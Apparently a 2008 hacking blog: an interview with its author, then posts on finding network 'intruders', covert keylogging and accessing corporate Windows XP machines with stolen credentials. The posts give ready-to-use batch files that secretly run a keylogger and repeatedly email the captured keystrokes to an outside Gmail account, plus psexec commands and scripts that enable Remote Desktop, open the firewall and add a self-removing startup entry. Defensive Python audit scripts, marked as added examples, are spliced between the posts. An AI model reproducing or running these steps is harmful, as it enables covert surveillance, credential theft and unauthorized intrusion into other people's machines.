I killed f33r.com (my old proxy) because it was literally eating my bandwidth. The only thing I kept was the email address @f33r.com. As for infinityandthevoid, TRH has taken up a lot of my time and I haven't gotten a chance to really post some things on there.

What's your typical day like?

Wake up, then take a shower and such.
Then I usually squeeze in about 30 minutes of screen time before heading off to school. After my studies I could clock in anywhere from 2 to 7 hours on TRH and other sites. On the weekends, the only person who can get me away from my screen is my girlfriend. I have an addiction t(*_*t)

Do you write your own exploits, if so what language?

I used to write some exploits with a small hacker group that is unfortunately nonexistent at this time. We were called Immortal.Hackers or -[iHs]- for short. We would usually code in Python.

What's your main machine stats? How many machines do you run?

At home, I have 2 desktops running Vista and Ubuntu and my laptop running a modded version of XP. They all have 2GB+ RAM, AMD Athlon 64 X2 processors. The machine I use the most would be the Vista desktop, seeing as that's where TRH is backed up every couple of hours :) I am also setting up a VM for the future Wargames on TRH.

Favorite non-computer related hobby?
Either reading or playing rugby. I like violent sports because they can really bring out the stress you've built up in the day. Reading because I don't plan on staying ignorant forever. Wait. Does it count if I read books on hacking?

Do you have anything to say to aspiring noobs in general?
You have to want to learn. Things won't be spoonfed to you in the hacking world. You can get some great guidance but no one will hack for you. You have to read and try to learn as much as you can on any given subject. The more you read, the better you will become. A year ago I didn't know what a hash was. Now I can hack servers and deface webpages with ease. It's all about your will to learn.

Also, don't let yourself be pushed around by other hackers. If you do, push right back. You have to be strong in the online world.

Sunday, February 17, 2008

A link everyone should already have

http://www.phenoelit-us.org/dpl/dpl.html

Default password list. Go to their site, read about phenoelit, then get that list in your memory.

Tuesday, February 12, 2008

I registered a channel in IRC

I registered an IRC channel on the chat4all.org servers:
http://www.chat4all.org/

You will have to point your client at them; the name of the room is #computer-punks.
There isn't a lot of traffic right now, but maybe there will be in the future. I should say it's just me and one other guy.

Wednesday, January 30, 2008

Finding and Executing wireless intruders

Finding the intruder.

The easiest way to check is to go into your router and look at the DHCP client table to see which IPs on your network are in use. Routers differ a lot from one another; to get to yours, type ipconfig at the command prompt, and your router will be at the address listed as the default gateway. Type that address into the address bar of your web browser (this assumes you have a consumer-grade router in your house, not something like a Cisco 2611). A login screen should pop up. If you do not know your router's username and password, find it on the default password list:

https://www.bestvpn.com/default-router-login-details/

Some people will appreciate this list more than others. On a Linksys you click the Status button, then Local Network, then DHCP Client Table. If you don't have control of the router on your network, you can use angryIP to scan your network for IPs; typically your range will be 192.168.1.0 to 192.168.1.254. Or you can use an ARP scan tool like Cain and Abel (oxid.it). Anyway, once you have one of these lists, eliminate the IPs that belong to your own devices. If you can eliminate all the IPs you have no intruder; if you cannot, you may have an intruder.
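The elimination step above is tedious by hand once you have more than a handful of devices, so here is a small script that does it for you. This is an added example, not code from the original post: SCAN_OUTPUT and KNOWN_MACS are constructed sample values, and in practice you would paste in your router's DHCP client table (or the output of an ARP scan of 192.168.1.0 to 192.168.1.254) and the MAC addresses of the devices you own.

```python
"""Check a DHCP client table or ARP scan against the devices you actually own.

Added example, not code from the original post. SCAN_OUTPUT and KNOWN_MACS
are constructed sample values; replace them with your router's DHCP client
table (or an ARP scan of your range) and your own devices' MAC addresses.
"""
import re

# Constructed sample of a scan: IP, MAC, optional hostname, one host per line,
# with a header line like many tools print. MACs appear in three common notations.
SCAN_OUTPUT = """\
IP Address     MAC Address         Hostname
192.168.1.1    00:11:22:33:44:55   router
192.168.1.10   AA-BB-CC-DD-EE-01   desktop
192.168.1.11   aabb.ccdd.ee02      laptop
192.168.1.37   DE:AD:BE:EF:00:42   android-3f9c
"""

# MACs of the devices you own (constructed). Any of the notations above is accepted.
KNOWN_MACS = {
    "00:11:22:33:44:55",  # router
    "aa-bb-cc-dd-ee-01",  # desktop
    "AABB.CCDD.EE02",     # laptop
}


def normalize_mac(mac):
    """Return the MAC as lowercase colon-separated hex; raise ValueError if it is not one."""
    hexdigits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if not re.fullmatch(r"[0-9a-f]{12}", hexdigits):
        raise ValueError("not a MAC address: %r" % (mac,))
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))


def parse_scan(text):
    """Return (ip, mac, hostname) tuples from scan lines.

    Lines whose second field is not a MAC (headers, blanks) are skipped.
    """
    hosts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            mac = normalize_mac(parts[1])
        except ValueError:
            continue  # header or otherwise malformed line
        hostname = parts[2] if len(parts) > 2 else ""
        hosts.append((parts[0], mac, hostname))
    return hosts


def find_unknown_hosts(scan_text, known_macs):
    """Return hosts whose MAC is not in known_macs; empty means every address is accounted for."""
    known = {normalize_mac(m) for m in known_macs}
    return [host for host in parse_scan(scan_text) if host[1] not in known]


if __name__ == "__main__":
    unknown = find_unknown_hosts(SCAN_OUTPUT, KNOWN_MACS)
    if not unknown:
        print("every address on the network belongs to a known device")
    for ip, mac, hostname in unknown:
        print("unaccounted-for device: %s  %s  %s" % (ip, mac, hostname))
```

Two caveats when you use this for real: a device configured with a static address never appears in the DHCP client table but does show up in an ARP scan, so prefer the scan when you can run one; and a MAC address is trivially changeable by whoever controls the device, so an address that matches your list is only a weak sign that the device is yours.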

Eliminating the intruder.

The first and easiest thing to do is see if he has simple file sharing enabled. To do this hit Start -> Run, then type \\ipaddress (and yes, you do have to use the right slashes; a good way to think about it is that \ is a Windows slash and / is a *nix slash). OK, let's say that doesn't bring up any shares, or it times out. Next we want to nmap the target.

http://nmap.org/download.html

After the install use the cmd line interface to nmap by hitting start->run then typing cmd. Now you are at the command line and you want to use nmap so type:

nmap targetip -P0 -O

That's a P and a zero, and then the second one is an uppercase letter O. It means nmap won't ping first and will try to identify the OS as well. Ports you want to see open are 22 (SSH on *nix boxes), 3389 (RDP on Windows boxes), or any of the VNC ports. THC Hydra can brute force SSH and TSGrinder can brute force RDP.

http://www.hammerofgod.com/download.html

But remember brute force is just brute force. It's really unskillful and oafish. You would probably rather try something more subtle like sniffing.

Please look at one of my earlier posts on password sniffing.

So by now you have enough knowledge to own the box.

You may also just want to enumerate data on your victim. If you want you could just boot him from the network by enabling 802.1x on your router.

Monday, January 28, 2008

Key logging made easy.

You will need klogger from:

http://ntsecurity.nu/toolbox/klogger/

You will need a gmail account.

You will need blat from:

http://sourceforge.net/project/showfiles.php?group_id=81910

And Nircmd:

http://www.nirsoft.net/utils/nircmd.html

Ok put everything in a single directory on a flash drive, or a cd. Just a directory you can drag onto the target computer.

You should have blat.dll, blat.exe, blat.obj, klogger and nircmd.

Ok now we are going to make two .bat files.

One is start.bat, which launches everything:

nircmd.exe execmd CALL klogger
nircmd.exe execmd CALL go.bat

The next one is go.bat and you will need to do some editing to it.

goto THREE
:THREE
ping 127.0.0.1 -n 100 -w 1000> nul
REM the ping acts as a wait
Blat klogger.txt -to bsdpunk@gmail.com -u bsdpunk@gmail.com -p password -f bsdpunk@gmail.com -server gsmtp183.google.com
REM Please don't use my email address, use your own and your own password etc.
goto THREE


You should now have blat.dll, blat.exe, blat.obj, go.bat, klogger, nircmd and start.bat.

Just drag your folder with these files to the target computer and run start.bat.


EDIT: You will need to use a different server, as gsmtp183.google.com is no longer publicly available.

Thursday, January 24, 2008

Accessing WinXP Pro computers in a corporate environment.

In most corporate environments all the XP boxes are on a domain, which means their credentials are just flying around all over. Let's say you got some Windows passwords and cracked them, from my last tutorial.

Or let's say you got some cleartext passwords from some HTTP stuff and you think that those passwords are the same as the Windows passwords.

Typically on corporate machines RDP is enabled but if it isn’t then you can use psexec to get your head in the door.

http://www.microsoft.com/technet/sysinternals/security/psexec.mspx

Open the cmd prompt by hitting start run, then typing cmd then hitting enter.

Type this into the cmd prompt (make sure you are in the directory that psexec is in when you do this, or add psexec to the system path):

psexec \\machinename -u username cmd

It will prompt you for a password, which you have conveniently commandeered. Oh, and username should be the actual account name, not the literal word. This will start a command prompt on your machine that is actually running on the other machine, so you have \\machinename's cmd prompt open and can do any of your normal command prompt stuff from here. psexec has an option for uploading a file when you use it, but it is a little tricky. What I do is use the net command to map a drive from the other computer back to your computer, like so:

net use r: \\breadstick\public /persistent:no

This will map drive R: to the shared folder named public on the computer breadstick. So now you can just type (remember, this is in the other computer's cmd, not your own):

R:

to access it.

So you can run a silent install of VNC for some sweet GUI action, or, if you know no one is actually in front of the computer, you can create these three .bat files and run first.bat.

Make three .bat files in the same directory on a thumb drive:

first.bat

code:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
cd %USERPROFILE%\Start Menu\Programs\Startup
copy c:\batter\second.bat start.bat
shutdown -r -t 0

second.bat

code:

netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
third.bat

third.bat

code:

cd %USERPROFILE%\Start Menu\programs\Startup\
del start.bat


This will enable remote desktop on that machine so that you may remote into it.
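If you administer machines that could be reached this way, the two changes first.bat makes are cheap to check for: the fDenyTSConnections registry value flipping to 0 and a script appearing in a user's Startup folder. The following is an added example, not code from the post. It works on saved text rather than touching the registry directly, so it runs anywhere: REG_QUERY_OUTPUT stands in for the output of reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections, and STARTUP_LISTING for a dir /b of the Startup folder; both samples and the SCRIPT_EXTENSIONS list are constructed for the example.

```python
"""Audit a Windows host for the two changes first.bat makes: Remote Desktop
enabled through fDenyTSConnections and a script dropped into the Startup folder.

Added example, not code from the original post. It parses saved command output
instead of reading the registry so it can run on any machine; the samples are constructed.
"""
import re

# Constructed output of:
#   reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0
"""

# Constructed listing of a user's Startup folder, one entry per line (dir /b style).
STARTUP_LISTING = """\
desktop.ini
start.bat
"""

# Extensions that execute when placed in Startup (hypothetical list, extend as needed).
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".lnk")

# One "name  TYPE  data" line of reg query output.
_REG_LINE = re.compile(r"^\s*(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.+?)\s*$")


def parse_reg_query(text):
    """Map value name -> (type, data) from reg query output; the key header line is skipped."""
    values = {}
    for line in text.splitlines():
        m = _REG_LINE.match(line)
        if m and not line.lstrip().startswith("HKEY_"):
            values[m.group("name")] = (m.group("type"), m.group("data"))
    return values


def rdp_enabled(reg_text):
    """True when fDenyTSConnections is 0 (connections allowed), False when non-zero.

    Returns None if the value is absent so the caller can tell 'unknown' from 'disabled'.
    """
    entry = parse_reg_query(reg_text).get("fDenyTSConnections")
    if entry is None:
        return None
    _type, data = entry
    return int(data, 0) == 0  # REG_DWORD prints as hex, e.g. 0x0 or 0x1


def suspicious_startup_entries(listing):
    """Return Startup folder entries that are scripts or shortcuts rather than data files."""
    return [name.strip() for name in listing.splitlines()
            if name.strip().lower().endswith(SCRIPT_EXTENSIONS)]


def audit(reg_text, startup_listing, rdp_expected=False):
    """Return a list of findings; an empty list means the host matches the expected baseline."""
    findings = []
    enabled = rdp_enabled(reg_text)
    if enabled is None:
        findings.append("fDenyTSConnections not found; cannot determine RDP state")
    elif enabled and not rdp_expected:
        findings.append("Remote Desktop is enabled (fDenyTSConnections=0) but baseline says disabled")
    for entry in suspicious_startup_entries(startup_listing):
        findings.append("script in Startup folder: %s" % entry)
    return findings


if __name__ == "__main__":
    for finding in audit(REG_QUERY_OUTPUT, STARTUP_LISTING):
        print("FINDING:", finding)
```

Pass rdp_expected=True for hosts where Remote Desktop is supposed to be on, so the audit only reports the Startup folder; everything the function reports is a deviation from what you told it to expect, which is what makes it usable across a fleet of saved outputs.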